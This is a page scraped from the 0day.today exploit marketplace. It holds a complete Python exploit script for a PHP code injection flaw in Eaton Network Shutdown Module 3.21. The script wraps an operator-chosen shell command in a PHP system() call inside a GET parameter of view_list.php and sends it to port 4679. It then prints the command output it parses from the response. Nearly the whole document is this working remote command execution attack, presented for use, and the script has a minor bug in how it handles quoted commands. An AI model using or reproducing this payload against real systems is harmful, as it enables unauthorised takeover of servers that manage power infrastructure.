0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Eaton Network Shutdown Module 3.21 PHP Code Injection
#!/usr/bin/env python # # Quick 'n' Dirty - Metasploit module didn't do it for me # 2013 - Filip Waeytens - http://www.wsec.be # # Usage Example: ##~ $ python eaton.py 192.168.1.9 "net user" # #User accounts for \\ # #------------------------------------------------------------------------------- #Guest LocalAdmin #The command completed with one or more errors. # # Exploit Title: Eaton shutdown module php eval exploit # Date: 5 dec2013 # Exploit Author: Filip Waeytens # Vendor Homepage: powerquality.eaton.com # Software Link: http://powerquality.eaton.com/Products-services/Power-Management/Software-Drivers/network-shutdown.asp # Version: 3.21 # Tested on: WIN #References: ###Exploit Database: 23006 ###Secunia Advisory ID: 49103 ###Bugtraq ID: 54161 ###Related OSVDB ID: 83200 83201 ###Packet Storm: http://packetstormsecurity.org/files/118420/Network-Shutdown-Module-3.21-Remote-PHP-Code-Injection.html # import httplib import urllib import sys import BeautifulSoup #### First argument is the target IP - port defaults to 4679 targetip = sys.argv[1] command = sys.argv[2] targetport=4679 #### if a command has spaces: put between double quotes, the next lines strip the quotes if command.startswith('"') and string.endswith('"'): command = command[1:-1] #### build the urL to request baserequest = "/view_list.php?paneStatusListSortBy=" wrappedcommand="${@print(system(\""+command+"\"))}" ue_command = urllib.quote_plus(wrappedcommand) #### send request conn = httplib.HTTPConnection(targetip+":"+str(targetport)) conn.request("GET", baserequest+ue_command) r1 = conn.getresponse() #print "Getting answer: " #print r1.status, r1.reason #print "sent http://"+targetip+":"+str(targetport)+baserequest+ue_command data1 = r1.read() #### extract answer soup = BeautifulSoup.BeautifulSoup(data1) for p in soup.findAll("p"): #print dir(p) #strip first line result = p.getText().split("Warning")[0] print result.replace("Multi-source information on the power devices suppying the protected server","",1) # 0day.today [2024-07-07] #